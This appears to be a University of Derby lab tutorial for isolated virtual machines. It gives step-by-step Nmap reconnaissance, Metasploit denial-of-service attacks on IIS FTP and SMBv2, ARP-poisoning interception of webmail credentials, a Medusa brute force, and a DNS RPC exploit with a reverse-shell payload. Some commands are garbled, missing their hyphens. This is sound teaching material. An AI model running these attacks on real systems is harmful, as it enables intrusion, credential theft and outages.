Академический Документы
Профессиональный Документы
Культура Документы
1|P a g e
UNIVERSITY OF DERBY
Using a brute force tool to discover the password of an administrator account and then obtaining root access to that server by exploiting a stack buffer overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain Name System (DNS) service. The root access will then be used to launch a Virtual Network Computing (VNC) session.
This tutorial is designed to be enjoyable, but also educational, and you are reminded that it is a criminal offence to repeat these attacks without written authorisation from the organization, and individuals involved. Finally, due to the nature of this study, although the virtual machines are completely isolated and are unable to communicate with the University network or public network, there is monitoring software in use to ensure that any attempts to breach these security measures are logged.
2|P a g e
UNIVERSITY OF DERBY
Prelude To begin, please open the team of virtual machines in VMware Workstation: 1. Click the start Windows button. 2. Then go to Computer and open the root drive (C :\). Locate and open the StudentVMs folder, followed by STUART BUTCHER and finally, Hacking_Final
3. The Hacking_Final folder contains all of the virtual machines needed for this tutorial. Begin the tutorial by opening double clicking the Hacking_Final.vmtm file.
4. You will be greeted with VMware Workstation application displaying the Hacking_Final team tab. This contains all of the virtual machines.
3|P a g e
UNIVERSITY OF DERBY
5. With the team open, click Power on this team in the Commands box. This will start the boot up process.
The servers will start up in a particular order and take approximately 5 minutes before they are ready for use.
6. The virtual machines are ready for use when they display the Press Ctrl-Alt-Delete to logon screen.
To change between virtual machines, select them in the management panel above the console. Please be aware, if you are actively using the virtual machine, i.e. controlling its mouse, you will need to press CTRL + ALT to return to the host.
4|P a g e
UNIVERSITY OF DERBY
Reconnaissance The first task is to determine what else is on the local network and what each active host is responsible for. To do this, we will be using a tool known as Nmap included with BackTrack. 1. In the VMware Workstation window, take control of the ATTACKER virtual machine by selecting it from the management panel above the console. 2. Click the mouse anywhere on the virtual machine console window to take control of it. You will see a prompt bt login: at the bottom of the window. Type the username attacker and press return. You will be asked for the password, which is attacker.
You will not be able to see the password input. If you enter it incorrectly, you will need to repeat the process. 3. Following successful log on, the graphical user interface will
5|P a g e
UNIVERSITY OF DERBY
4. If a shell window does not automatically appear, click the Konsole application icon on the bottom menu bar.
5. Before it is possible to discover other devices on the local subnet, the attacker needs to know what subnet they belong to. To do this, type ifconfig eth0 into the shell window. Press return.
6. Take a note of the IP address and subnet mask. 7. The local IP address is set to 172.172.1.10 with a subnet mask of 255.255.255.0. This means that the network address must be 172.172.1.0. Therefore to discover other devices within the subnet, type sudo nmap sP 172.172.1.0/24 into the shell window. The sudo command runs the command with administrative privileges and you may therefore be prompted for a password. If this happens, type attacker. Please note, all commands are case sensitive.
6|P a g e
UNIVERSITY OF DERBY
8. Nmap has revealed that there are three other clients on the local subnet (one of the hosts identified is BackTrack itself). a. 172.172.1.20 b. 172.172.1.100 c. 172.172.1.101 9. With the IP addressing information ascertained, it is now possible to acquire brief details of what services each host is responsible for. To do this, type sudo nmap v O {Target IP}
10. From the targeted scan, Nmap reveals the Operating System, network interface card MAC address, and open ports. The ports highlight the services running on the target. Repeat the scan for the remaining hosts.
Open Ports
Services used by ports Network Interface Card MAC Operating System Information
7|P a g e
UNIVERSITY OF DERBY
11. Although there is now a basic understanding of what ports and services are in use, it is possible to obtain more detailed information by interrogating services. For example, virtual machine with IP address 172.172.1.101 indicates it is running Internet Information Services (IIS) to power its web server, but it does not advertise which version. To discover the version of IIS, type sudo nmap A T4 F 172.172.1.101. Repeat the scan on the remaining hosts.
With some FTP servers, it is possible to gain specific system information by connecting to the server using Telnet and typing SYST.
8|P a g e
UNIVERSITY OF DERBY
Attacks With the knowledge now known about the other hosts on the local subnet, it is possible to find vulnerabilities on each. Discovered vulnerabilities are publicised on the National Vulnerability Database in an attempt to help administrators protect their systems and vendors to update their software. Information gathered about each host, and the potential vulnerabilities available to be exploited are shown below. 172.172.1.20 VICT-CLI01 This host is using Windows XP SP2 or SP3, which may make it vulnerable to relative path stack corruption on the Server service, which could result in obtaining root access, as described in CVE-2008-4250. 172.172.1.100 VICT-SRV01 172.172.1.100 appears to be responsible for DNS, Active Directory, web service, and email. It is also using the Windows Server 2003 Operating System. Therefore, this host may be vulnerable to an exploit of the RPC interface of the DNS service (CVE-20071748). Additionally, as this host also appears to be responsible for email services, it could be possible to conduct a Man-In-The-Middle attack on the secure HTTP traffic when a user logs in to their mailbox.
9|P a g e
UNIVERSITY OF DERBY
172.172.1.101 VICT-SRV-WEB1 This virtual machine appears to have two interesting services; FTP and HTTP. This suggests that the server is hosting one, or more, webpages as well as providing a download/upload service of files. Additionally, it is clear that the server is using a Server 2008 based Operating System.
As this host is using IIS 7.0, it is likely that the FTP server is using version 7.5. Therefore, it may be vulnerable to a Denial of Service attack as a result of a heap overflow. Further to this, Nmap has indicated that it is using SMB v2, which is known to be vulnerable to an array index error when an ampersand character is inputted into the Process ID field.
This triggers an attempted dereference of an out of bounds memory location, and consequently results in a Blue Screen of Death (CVE-2009-3103).
10 | P a g e
UNIVERSITY OF DERBY
IIS FTP 7.5 DoS It is possible to terminate the FTP service on a Windows server if they are running version 7.5. The vulnerability occurs when the FTP server attempts to encode a portion of overwritten FTP response when a string of 0xFF has been supplied; even past the end of the heap buffer, resulting in heap buffer overrun. This can be demonstrated in the Metasploit Framework. 1. Change control of the virtual machines to VICT-SRVWEB1. If control is currently focused on a different virtual machine, then press CTRL+ALT. This will return control to the host computer. 2. Login by hitting CTRL+ALT+INSERT and typing H4ckM3! as the password. 3. Once logged in, click the Start button and type services.msc into the search bar, followed by hitting the return key.
4. A window containing all system services will be populated. Scroll through the list of services to find Microsoft FTP Service. It will show the service as Started.
5. Change control back to the ATTACKER virtual machine and open a shell window.
11 | P a g e
UNIVERSITY OF DERBY
6. Verify that it is possible to connect to the FTP server by typing ftp 172.172.1.101. If the FTP server is running and accepting new connections then it will display the welcome banner (220 Microsoft FTP Service) and will prompt for a login name. 7. Hit return twice and then type quit.
8. Type sudo msfconsole. If prompted for a password, enter attacker. It may take a short while to load.
9. Select the exploit to be used by typing use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof followed by hitting the return key. 10. Next, select the target by typing set RHOST 172.172.1.101. 11. Launch the attack by typing run.
12 | P a g e
UNIVERSITY OF DERBY
12. The attack will be launched. A completion message will be returned following the execution.
13. Change back to VICT-SRV-WEB1 and refresh the Services window. Do not close the shell window on BackTrack.
14. Find Microsoft FTP Service and notice that it is no longer Started.
The FTP service is no longer running. The attack has been successful. Server Message Block (SMB) Blue Screen of Death (BSoD) The reconnaissance also identified that VICT-SRV-WEB1 uses SMBv2, which has a known vulnerability. This vulnerability allows an attacker to execute code with systemlevel privileges. Failed exploit attempts result in Denial of Service conditions. This exploit involves purposely failing to execute code with system-level privileges. 1. On BackTrack, from the shell window used previously, type use
auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh. If you closed the shell window, open a new window and type sudo msfconsole to start Metasploit again. 2. Set the target by entering set RHOST {Target IP}. 3. Execute the attack by typing run.
13 | P a g e
UNIVERSITY OF DERBY
5. The virtual machine should be displaying a Blue Screen of Death. It is possible to see that the attack dereferenced of an out of bounds memory location by examining error. the
The victim will automatically reboot. The attack has been successful.
14 | P a g e
UNIVERSITY OF DERBY
Secure Sockets Layer (SSL) Man-in-the-Middle Attack Nmap revealed that there is an XP machine on the network. This is most likely a users computer. Nmap also identified 172.172.1.100 as the mail server. Therefore, it is possible to sniff traffic and poison ARP packets in order to intercept SSL data by acting as a middle-man. 1. Change control to VICT-CLI01 and press CTRL+ALT+INSERT. Enter thevictim as the username and Password01 as the
password.
3. When the page begins to load, a security alert window will appear. Click View Certificate.
15 | P a g e
UNIVERSITY OF DERBY
4. The certificate will display three tabs, General, Details, and Certification Path. Open the Details tab.
5. The details tab contains all of the information relating to the site certificate. Take a note of the Issuer and information within the text box below.
16 | P a g e
UNIVERSITY OF DERBY
7. Enter the username thevictim and password Password01. Then click Log On.
8. The users inbox will now be displayed. Click Log Off and then close the window.
17 | P a g e
UNIVERSITY OF DERBY
10. Change control to the ATTACKER and from within a shell window type sudo ettercap Tq i eth0 M arp:remote,oneway /172.172.1.20/ /172.172.1.100/ . If prompted, enter the password attacker.
11. ARP requests are now being poisoned. Change back to VICT-CLI01. If the virtual machine is locked, and press CTRL+ALT+INSERT and type thevictim for the username and Password01 for the password. 12. Click the Start button and open Internet Explorer. When the
security alert window displays, click View Certificate. 13. Click the Details tab and take a note of the Issuer.
14. The
difference
in
issuer
demonstrates that SSL traffic is being intercepted. 15. Click OK and then Yes to continue loading the web page.
18 | P a g e
UNIVERSITY OF DERBY
16. Enter the username thevictim and password Password01 on the login page and then click Log On to load the users inbox. 17. Once successfully logged in, change control back to ATTACKER and notice the user details are printed to the display of the shell window.
18. In the shell window, type q and the sniffing and poisoning will terminate. 19. Return to VICT-CLI01 and click Log off. If the virtual machine is locked, enter thevictim as the username and Password01 as the password. 20. Shut down the VICT-CLI01 virtual machine by clicking the Start button and then Shut down. Click OK on the next window.
19 | P a g e
UNIVERSITY OF DERBY
Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission Control Protocol (TCP) Overflow Nmap identified that server with IP address 172.172.1.100 is not only an e-mail server, but also responsible for the DNS and Active Directory. Unfortunately, Nmap also highlighted that the system is relatively unpatched and a known vulnerability to that particular OS (and service pack) involves causing a buffer overflow in the RPC interface of the DNS service. This is triggered when a long zone name parameter is supplied that contains escaped octal strings in a TCP packet. This will allow root access. However, in order to take control of the servers graphical user interface, the administrator credentials must be known. For this part, it is assumed that the administrator username is Administrator 1. On the ATTACKER machine, minimise the shell window if there is one open.
2. On the desktop, there is a file titled passwords. Click on it to open it. When prompted, click Open Session. 3. A text file containing a list of passwords will be displayed.
4. Close this window by clicking the X at the top right of the window.
5. Restore the shell window, or open a new one if there was not one already open.
20 | P a g e
UNIVERSITY OF DERBY
6. Start the brute forcing tool known as Medusa by typing medusa h 172.172.1.100 u Administrator P /home/attacker/passwords f F M smbnt followed by the return key.
7. Medusa will run through all of passwords in the password text file checking to see if there is a match. When it finds the correct one, it will display SUCCESS.
8. Take a note of the password and run Metasploit by typing sudo msfconsole. If prompted for the password, type attacker.
9. When Metasploit has loaded, type use exploit/windows/dcerpc/ms07_029_msdns_zonename and hit return. 10. Select the payload type to be used by typing set PAYLOAD
windows/meterpreter/reverse_tcp followed by the return key. 11. Define the source address to be used in the reverse Transmission Control Protocol (TCP) by typing set LHOST 172.172.1.10. 12. Enter the target
address by typing set RHOST 172.172.1.100. 13. Type exploit to execute the attack.
21 | P a g e
UNIVERSITY OF DERBY
14. If the attack is successful, a session with the server will be established. 15. To view the screen of the server type run getgui e.
16. Open a new shell window. When the prompt displays, type rdesktop u Adminsitrator p H4ckM3! 172.172.1.100 and press return.
22 | P a g e
UNIVERSITY OF DERBY
18. It is not possible to shut the server down unless a comment is given. In the comment box, press space and then click OK.
19. The server will warn that other users will be disconnected. Click Yes to continue.
20. The server will now begin the shutdown process. Confirm this by changing control to the VICTSRV01 virtual machine. When the server shuts down, this attack is completed. In a production environment, the loss of the e-mail server and domain controller would result in major disruption to a business. Cleaning Up To complete the tutorial, shut down the remaining virtual machines: 1. Take control of VICT-SRV-WEB1 and pressing CTRL+ALT+INSERT to log in. Use the username Administrator and password H4ckM3! 2. If asked for a reason why the server unexpectedly shut down, hit the spacebar in the comments box followed by OK. 3. Once logged in, click the Start button followed by the right arrow button next to the padlock icon.
23 | P a g e
UNIVERSITY OF DERBY
5. If asked for a reason for shut down, press the spacebar in the comments box and click OK.
6. The server will begin the shutdown sequence. Change control to the ATTACKER virtual machine. 7. Close any shell windows that may be open, and click the far left icon on menu bar.
8. When the panel displays, click Log Out. Another window will appear. Click Log Out on this new window.
9. Once the graphical user interface has closed, click anywhere in the console window to ensure it is taking keyboard input. Type sudo poweroff.When prompted, enter the password attacker.
10. The system will now begin shutting down. When all virtual machines have shut down, the Hacking_Final home tab will be displayed in VMware Workstation. Thank you for taking part in this investigation. Please complete the online survey. The password for the survey is Attacker.
24 | P a g e